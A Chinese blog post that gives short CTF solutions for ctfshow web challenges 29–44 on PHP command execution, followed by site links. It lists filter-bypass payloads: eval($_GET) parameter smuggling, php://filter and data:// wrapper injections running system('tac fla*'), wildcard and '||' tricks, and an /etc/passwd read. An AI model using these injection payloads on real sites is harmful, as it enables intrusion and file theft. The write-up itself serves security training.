ctfshow 命令执行

已于 2022-03-22 20:53:31 修改
阅读量4.8k 收藏
点赞数
文章标签: 安全
于 2022-03-21 20:11:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58519918/article/details/123644744
版权

Web(29)

首先可以用system(“ls”)来查看文件,是flag.php

用tac,,命令来输出文件。

不过flag被屏蔽了

所以可以用?或*来代替

?代表了一个字符站位

*代表了多个。

Web(30)

?c=echo`cat *`;

因为system被限制了所以要通过别的来进行来解决。

Cat与tac一个是正面一个是反面

Web(31)

/?c=eval($_GET[1]);&1=system('tac flag.php');重新引用了一个变量,这个变量拥有c的值但不受c的限制。通过tac或cat命令来得到。

Web(32)

这次同样用了新建一个变量但是由于system的禁用就使用文件包含来解决,由于本身使用1=flag.php无法使文件呈现出来所以只能使

来解决这个问题。最后得到的结果来进行base64解码直接得到。Linux 系统中的 /etc/passwd 文件,是系统用户配置文件,存储了系统中所有用户的基本信息,并且所有用户都可以对此文件执行读操作。

filter:通过指定的通道来读取指定的文件这里使用base64读取不用base64读不到源文件

Web(33)

同上(32)也可以把include改为require

Web(34)

常见的不需要括号的语言结构有:{ echo    print   isset    unset    include   require   }

Isset:   isset()函数用于检测变量是否已设置并且非NULL。如果已经使用unset()释放了一个变量之后,再通过isset()判断将返回FALSE。

如果使用isset()测试一个被设置成NULL的变量,将返回FALSE。同时要注意的是null字符(“ \ 0”)并不相等于PHP的NULL常量。

语法:布尔isset (混合$ var [,混合$ ... ] )  。

参数说明:$ var:要检测的变量。

如果一次添加多个参数,那么isset()仅在全部参数都被设置时返回TRUE,计算过程从左至右,中途遇到没有设置的变量时就会立即停止。

Unset: unset的作用_hongmingover的博客-CSDN博客_unset函数的作用

Print :phpinfo();数据段不在代码段所以不可以通过print来执行但eval可以来执行但必须要有括号

Include:为读取,/?c=include%0A$_GET[1]?>&1=/etc/password读取文件看能否读取能了就继续上面的操作。

Web(35)

与上面方法一样/?c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

Web(36)

同上但数字不能用了。换成字母即可。

Web(37)【伪协议的使用】

data://text/plain,<?php system("tac fla*");?>

在哔哩哔哩上找的(相关的伪协议)常见于文件包含,文本包含  

Data协议是把后面的字母 ,数字,字符串作为php代码来运行。

用到data伪协议来执行后面可以用前面的方法来进行解决。Tac或cat等来执行。

Web(38)短标签

短标签:因为过滤了php所以之前的data协议不能照办了。要改变一下。

/?c= data://text/plain,<?= system("tac fla*");?>

//php.ini

short_open_tag = On

//除<?php ?>,可使用更灵活的调用方法

<? /*程序操作*/ ?>

<?=/*函数*/?>

这是短标签的调用形式

Web(39)

/?c=data://text/plain,<?php system("tac fla*");?>

{有个小问题用协议的时候直接复制上我之前的还不行要在点一遍,我哪里错了。。。}

加了个后缀但对于我们构建的playload没有影响因为?>对他进行了隔离,没有影响到我们的构建。

Web(40)

show_source(next(array_reverse(scandir(pos(localeconv())))));构建

print_r() 函数用于打印变量,以更容易理解的形式展示localeconv():是一个编程语言函数,返回包含本地数字及货币信息格式的数组。其中数组中的第一个为点号(.)

pos():返回数组中的当前元素的值。这里也可以换成current(),作用和pos类似

array_reverse():数组逆序

scandir():获取目录下的文件

next(): 函数将内部指针指向数组中的下一个元素,并输出。

通过 pos(localeconv())得到点号因为scandir('.')表示得到当前目录下的文件PS:如果我没有记错,scnadir('/')也能扫描当前目录下面的文件,但是这道题貌似无法使用chr(47)和chr(48)(.和/的ASCII码)进行过滤的绕过

这是节选https://www.cnblogs.com/echoDetected/p/13886197.html#里的

Web(41)

Web(42)

" >/dev/null 会把结果写到一个写道一个黑洞中让他无法运行。解决方法在其后多写一个函数,让多写的函数进入函数,以兵换将。

Web(43)

因为; 被限制了可以使用||来代替。比上一题多了给符号的转化。

Web(44)

/?c=tac fla?.php||ls

多了个flag的限制。用个*号或?号来代替。

来摔锅
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow 每周大挑战 极限命令执行
m0_64815693的博客
02-12 3850
ctfshow 每周大挑战 极限命令执行 wp
CTFshow 1-10关
weixin_62369433的博客
11-11 2125
CTFshow 1-10 通关详解
网络安全最全CTFShow-电子取证篇Writeup_ctfshow 电子取证,2024年最新最新网络安全面试合集
最新发布
2401_84252820的博客
05-14 882
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
CTFshow-pwn入门-前置基础pwn13-pwn19
T1ngSh0w的博客
06-17 1825
ctfshow pwn入门-前置基础pwn13-pwn19
CTFShow-MISC入门篇详细wp(1-56)
热门推荐
Aluxian_的博客
07-19 1万+
cffshow-misc 入门 wp解析
ctfshow-MISC入门-图片篇(文件结构)24-40
Wkc_03的博客
05-27 1649
一般的图片藏flag都会将flag藏在图片下面,如果图片是png,只需要将高度修改即可,然而此题给的是bmp文件,像素信息直接就是在图片的hex中,所以存在将flag藏在图片上面的可能。发现030editor有模板,这个实在是好用,像这次不太清楚gif的图片格式,也可以通过其标注的颜色区分,再根据鼠标移动位置提供的提示,找到高度调整的位置。调整高度后,显示出flag,但是由于gif动图,删的太快,没有看到,用lsp看即可。没有遇到过的题型,看了一下wp,是需要取帧,利用不同帧之间的间隔时间来隐写的。
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
ctfshow web240 insert 爆破表名
10-21
ctfshow web240 insert 爆破表名
ctfshow(卷王杯)
qq_62046696的博客
09-24 1463
首先我们的前提是if(isset($_POST['a']) && isset($_POST['b']) && isset($_POST['c']))} 这里的name就是上面的string传进来的,但是 $var = $this->$name;array_walk函数的作用就是遍历自定义函数,其中$fn的值为成员的值,prev为成员变量的名字。这是个等于号,相当于赋值,而对于数组无法赋值的情况就是当键溢出就行,可以看到上一句有。如果是数组的话,第一个是类,第二个是方法,第三个是属性。
ctfshow—反序列化
cosmoslin的博客
11-15 2063
简介 序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。 php 将数据序列化和反序列化会用到两个函数 serialize 将对象格式化成有序的字符串 unserialize 将字符串还原成原来的对象 序列化的目的是方便数据的传输和存储,在PHP中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。 常见的魔术方法 __construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用
ctfshow,命令执行系列
m0_73500273的博客
06-19 232
屏蔽的阐述有点多,采用文件包含。先让他多获取一个参数 a 并且执行就要用到include但是要加空格,空格被屏蔽了,尝试用进行转码有%0A是空格就有include%0A$_GET[a]这就是获取参数,下面就是构造文件了,这里哟啊用到php伪协议,使用data://进行执行 data://text/plain,后发现有两文件,使用tac进行读取。
ctfshow web入门之命令执行
uuzfumo的博客
12-17 1061
命令执行姿势
CTFshow web入门之命令执行总结
小白的博客
05-10 358
1、命令执行函数。
CTFshow web入门之命令执行(web29-web77)
小白的博客
05-10 1319
2、然后上传一个new2.php文件并抓包,多试几次,因为不一定生成的临时文件的最后一个字母是大写,文件内容如下。1、先构造一个文件上传的html页面,代码如下(test-fileupdown.html)3、在上传文件的过程中,抓包,之后添加参数c=.%20/?4、所以传入这个参数的意思就是匹配上传command.php所生成的临时文件,并执行。接着直接用cat flag.php查看一下flag.php文件就好了。略(与web41相同)
CTFSHOW php命令执行
m0_64180167的博客
08-11 707
这里能发现是匹配flag 但是存在高亮 高亮有需要路径同时存在eval 命令执行所以我们传入命令但是过滤了flag我们看看怎么绕过发现了 flag我们绕过正则匹配flag字符串。
ctfshow-命令执行(web118-web122)
m0_72125469的博客
02-08 867
一部分命令失败会返回1,也有一些命令返回其他值,表示不同类型的错误,比如Command not found返回127。code,并不是,
ctfshow web入门命令执行
09-05
在CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过技巧,如分号、竖线、双与号等。这些技巧可以用来绕过应用程序对输入参数的限制,从而注入恶意的命令。 引用中提到的payload,其中使用了一个通用的命令执行函数"show_source"来显示指定文件的源代码。这个payload可以用来尝试执行"flag.php"文件的源代码。但前提是要知道有一个名为"flag.php"的文件存在。 另外,引用中提供了另一种payload的示例,其中使用了array_reverse和scandir函数来获取文件目录并显示指定文件的源代码。同样,也可以直接使用show_source('flag.php')来显示"flag.php"文件的源代码。 需要注意的是,命令执行漏洞是非常危险的,因为它可以导致恶意用户执行任意的系统命令。为了保护Web应用程序免受此类攻击,开发人员应该对用户的输入进行严格的验证和过滤,并使用安全的编程实践来防止命令注入漏洞的发生。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [ctfshow web入门之命令执行](https://blog.csdn.net/uuzfumo/article/details/128357863)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CTFShow Web入门 命令执行](https://blog.csdn.net/qq_19533763/article/details/123910732)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值